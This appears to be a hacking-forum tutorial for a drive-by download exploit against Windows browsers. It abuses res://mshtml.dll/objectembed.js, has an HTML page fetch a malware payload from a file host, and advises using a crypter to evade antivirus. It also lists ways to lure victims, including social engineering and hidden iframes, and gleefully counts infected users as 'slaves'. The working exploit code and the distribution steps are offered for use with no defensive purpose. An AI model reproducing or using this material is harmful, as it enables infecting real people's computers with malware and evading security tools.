This is a remote exploit which affects Firefox, Internet Explorer, and Safari running on Windows computers, exploiting res://mshtml.dll/.
What you will need:
Here is what you are going to do:
Have fun! (;
What you will need:
- A webhost (for your exploit page)
- A file host (to upload your malware)
- Victims (to download your malware)
- A couple of minutes to setup the exploit
Here is what you are going to do:
- Find a site where you can upload a file and have a direct download link, then signup. Try fileave.com, or fileden.com.
- Upload your malware to the file host. If it is not FUD or detected by some antiviruses, you may want to use a crypter (available here on HF) to make your file undetected, and reduce the risk of your file being deleted or detected by your slave's antiviruses.
- Go to your webhost, and create a new HTML file, with the following source:Code:
<html><head>
<script src="res://mshtml.dll/objectembed.js"></script>
<script language="javascript">
var objectSource = "http://[FILE].gif";
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html> - Replace the [FILE] part of the code with the link to your download (it should be something like yournamehere.fileave.com/FILE.exe). The line should look something like the following:Code:
var objectSource = "http://starbreak.fileave.com/notavirus.exe.gif"; - Save the file, and get your victims to visit the page. You can do this via several ways, such as social engineering, hidden iframes in other pages, posting the link to online message boards, or simply just giving them the link.
- Watch as the number of slaves you have start rolling in! ^^
Have fun! (;
